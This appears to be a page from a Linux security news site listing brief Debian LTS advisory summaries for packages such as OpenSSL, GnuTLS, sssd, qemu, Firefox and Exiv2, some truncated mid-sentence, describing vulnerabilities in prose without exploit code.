Debian LTS Linux Distribution - Page 51.5
Find the information you need for your favorite open source distribution .
Find the information you need for your favorite open source distribution .
A security vulnerability has been found in Kaminari, a pagination engine plugin for Rails 3+ and other modern frameworks, that would allow an attacker to inject arbitrary code into pages with pagination links.
An issue has been found in grilo, a framework for discovering and browsing media. Due to missing TLS certificate verification, users are vulnerable to network MITM attacks.
The legacy 1.0 version of OpenSSL, a cryptography library for secure communication, fails to validate alternate trust chains in some conditions. In particular this breaks connecting to servers that use Let's Encrypt certificates, starting 2021-10-01.
Multiple vulnerabilities were discovered in nettle, a low level cryptographic library, which could result in denial of service (remote crash in RSA decryption via specially crafted ciphertext, crash on ECDSA signature verification) or incorrect verification of ECDSA signatures.
GnuTLS, a portable cryptography library, fails to validate alternate trust chains in some conditions. In particular this breaks connecting to servers that use Let's Encrypt certificates, starting 2021-10-01.
One security issue has been discovered in sssd. The sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root
Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code. For Debian 9 stretch, this problem has been fixed in version
It was found that the patch for CVE-2021-3592 introduced a regression which prevented ssh connections to the host system. Since there is no imminent solution for the problem, the patch for CVE-2021-3592 has been reverted. Updated qemu packages are now available to correct this issue.
Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.
An issue has been found in btrbk, a backup tool for btrfs subvolumes. Due to mishandling of remote hosts filtering SSH commands using ssh_filter_btrbk.sh in authorized_keys an arbitrary code execution would
An XML external entity (XXE) injection in pywps allows an attacker to view files on the application server filesystem by assigning a path to the entity.
Several security vulnerabilities have been found in Qemu, a fast processor emulator. CVE-2021-3713
An issue has been found in squashfs-tools, a tool to create and append to squashfs filesystems. As unsquashfs did not validate all filepaths, it would allow writing
PostgreSQL 9.6.23 fixes this security issue: Disallow SSL renegotiation more completely (Michael Paquier)
Several vulnerabilities have been discovered in Exiv2, a C++ library and a command line utility to manage image metadata which could result in denial of service or the execution of arbitrary code if a malformed file is parsed.
An issue has been found in gthumb, an image viewer and browser. A heap-based buffer overflow in _cairo_image_surface_create_from_jpeg() in extensions/cairo_io/cairo-image-surface-jpeg.c allows attackers to
An issue has been found in tnef, a tool to unpack MIME application/ms-tnef attachments. Using emails with a crafted winmail.dat application/ms-tnef attachment
During the backporting of one of patches in CVE-2020-22021 one line was wrongly interpreted and it caused the regression during the deinterlacing process. Thanks to Jari Ruusu for the reporting the issue and for the testing of prepared update.
An issue has been found in ircii, an Internet Relay Chat client. A crafted CTCP UTC message could allow an attacker to disconnect the victim from an IRC server due to a segmentation fault and client crash.
An issue has been found in scrollz, an advanced ircII-based IRC client. A crafted CTCP UTC message could allow an attacker to disconnect the victim from an IRC server due to a segmentation fault and client crash.
Sign up to get the latest security news affecting Linux and
open source delivered straight to your inbox
Powered By
Linux Security - Your source for Top Linux News, Advisories, HowTo's and Feature Release.